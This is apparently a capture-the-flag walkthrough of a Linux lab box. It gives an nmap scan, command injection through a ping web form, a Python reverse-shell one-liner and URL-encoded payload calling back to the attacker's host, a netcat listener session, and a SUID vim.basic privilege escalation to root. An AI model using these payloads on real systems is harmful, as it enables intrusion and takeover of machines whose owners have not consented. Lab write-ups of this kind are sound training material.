PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 33:b9:6d:35:0b:c5:c4:5a:86:e0:26:10:95:48:77:82 (RSA)
| 256 a8:0f:a7:73:83:02:c1:97:8c:25:ba:fe:a5:11:5f:74 (ECDSA)
|_ 256 fc:e9:9f:fe:f9:e0:4d:2d:76:ee:ca:da:af:c3:39:9e (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
It is an ping host website
Found some inspiration from this post https://www.hackerone.com/ethical-hacker/how-command-injections
Where we can add ; after the IP, inject some command we wants
Nice we can do command injection here, let’s do the one liner here to get the reverse shell
After trying so much one liner, only port 80 works, perhaps its because that port is opened.
And don’t forget to make it becomes python3 because the system does not have python
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.125",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
End result by visiting
<http://192.168.125.86/?host=192.168.49.125;python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.49.125%22,80)>);os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22/bin/bash%22)%27
We will get our reverse shell
┌──(kali㉿VirtualBox)-[~]
└─$ nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.49.125] from (UNKNOWN) [192.168.125.86] 42924
www-data@shakabrah:/var/www/html$ cat /home/dylan/local.txt
d49f86c89136814455bf33b0f17f3848
find / -perm -4000 -type f 2>/dev/null
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/traceroute6.iputils
/usr/bin/at
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/newgidmap
/usr/bin/vim.basic
/usr/bin/newuidmap
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/umount
/bin/fusermount
/bin/ping
/bin/mount
/bin/su
We have /usr/bin/vim.basic which is very sus.
However to use vim we need to upgrade our shell
export TERM=xterm
python3 -c "import pty;pty.spawn('/bin/bash')"
**Press CTRL+Z to background the shell and also run the command on attacker machine**
stty raw -echo ; fg
reset
/usr/bin/vim.basic -c ':python3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'